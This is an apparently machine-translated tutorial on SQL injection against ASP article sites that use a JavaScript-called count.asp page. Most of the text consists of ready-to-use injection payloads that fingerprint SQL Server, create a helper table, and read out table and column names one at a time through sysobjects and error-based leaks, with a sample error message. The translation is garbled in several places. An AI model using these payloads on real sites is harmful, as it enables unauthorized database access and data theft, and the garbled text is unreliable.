Summary of uncommon SQL Script Injection Methods

Have you ever met such a site? ArticleThe system uses the HTML file generated statically by FSO to display the file. This can reduce the server load and increase the access speed. Second, it also stops SQLInjection attacks.

Let me talk about their article system principle: all the articles are inDatabaseThere is a copy. In addition, an HTML page is generated based on the template.

Attack method: Check the source file/check whether there is a page called through Js. For example, call to update the browsing times of an article.

Can we try to inject: http: // server domain name/count. asp? Id = 1552

Check whether an error occurs. If an error occurs, the injection vulnerability exists. Then the attack is normal.

Create a post.htmfile and a log.txt text file on the local machine (this is a good habit)

Post.htm content: easy to input.

The SQL Server server can be judged as follows: add a semicolon after 1552. If it is normal, it may be SQL Server.

For such databases, You can first create a table id = 1552; Create Table AAA (AAA char (20 ));--

Insert a record: Id = 1552; insert into AAA values ('test ');--

Next, I will name his data table:

Id = 1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 );--

This is to update the first table name to the AAA field.

Id = 1552 and exists (select * from AAA where AAA> 5) will report an error. In most cases, the table name will be read directly:

Microsoft ole db provider for SQL Server Error '80040e07'

A syntax error occurs when the varchar value 'Vote' is converted to a column whose data type is int.

/Search. asp, row 21

Here, vote is the table name:

You can also guess a table name first, and then update the values of (select top 1 name from sysobjects where xtype = 'U' and status> 0) to a record of that table. Display on the webpage.

Read the first table, and the second table can be read as follows (ADD and name <> 'table name just obtained 'After the condition ').

Id = 1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name <> 'Vote ');--

Then Id = 1552 and exists (select * from AAA where AAA> 5)

Read the second table and read it one by one until it does not exist.

The read field is as follows:

Id = 1552; update AAA set AAA = (select top 1 col_name (object_id ('table name'), 1 ));--

Then Id = 1552 and exists (select * from AAA where AAA> 5) error.

Id = 1552; update AAA set AAA = (select top 1 col_name (object_id ('table name'), 2 ));--

Then Id = 1552 and exists (select * from AAA where AAA> 5) error.

...... And so on